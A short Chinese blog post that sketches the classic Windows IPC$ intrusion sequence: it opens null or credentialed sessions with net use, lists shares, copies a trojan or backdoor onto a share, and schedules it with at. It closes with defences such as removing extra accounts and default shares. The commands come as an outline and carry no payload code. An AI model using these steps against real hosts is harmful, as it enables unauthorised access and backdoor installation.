主要都是看这篇文章的http://blog.csdn.net/bytxl/article/details/46790995
这里自己总结一下,因为没有环境实战,也没有实战经验,所以就理理思路。
首先,
建立空连接
net use \\ip\ipc$ "" /user:""或者非空连接
net use \\ip\ipc$ "password" /user:"username"这里顺便讲一下删除连接
net use \\ip\ipc$ /del当然建立空连接的时候可以通过某些方法得到用户名和密码,具体我不会做,只知道这个可以获得用户名。
nbtstat -A \\ip然后查看目标主机上有哪些共享目录
net view \\ip接着就是往共享目录上上传文件(木马后门),当然你得有写入权限,至于权限的获取我并不会。
copy 要复制的文件及路径 目的路径最后当然是运行这个文件
获取远程主机的时间
net time \\ip用at运行刚才上传的文件,运行时间是远程主机的时间
at \\ip 时间 程序名好吧at命令似乎不支持了,改天再尝试。
防护主要从两个方面,一个是删除多余的账户,另一个是删除默认共享。
删除多余的账户可以参考
http://blog.csdn.net/qq_27607539/article/details/76019992
这个方法。
删除不必要的共享可以用
net share查看自己有哪些共享,然后用
net share 共享名 /del删除掉,更狠一点的可以直接禁用server服务:
net stop server /f
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
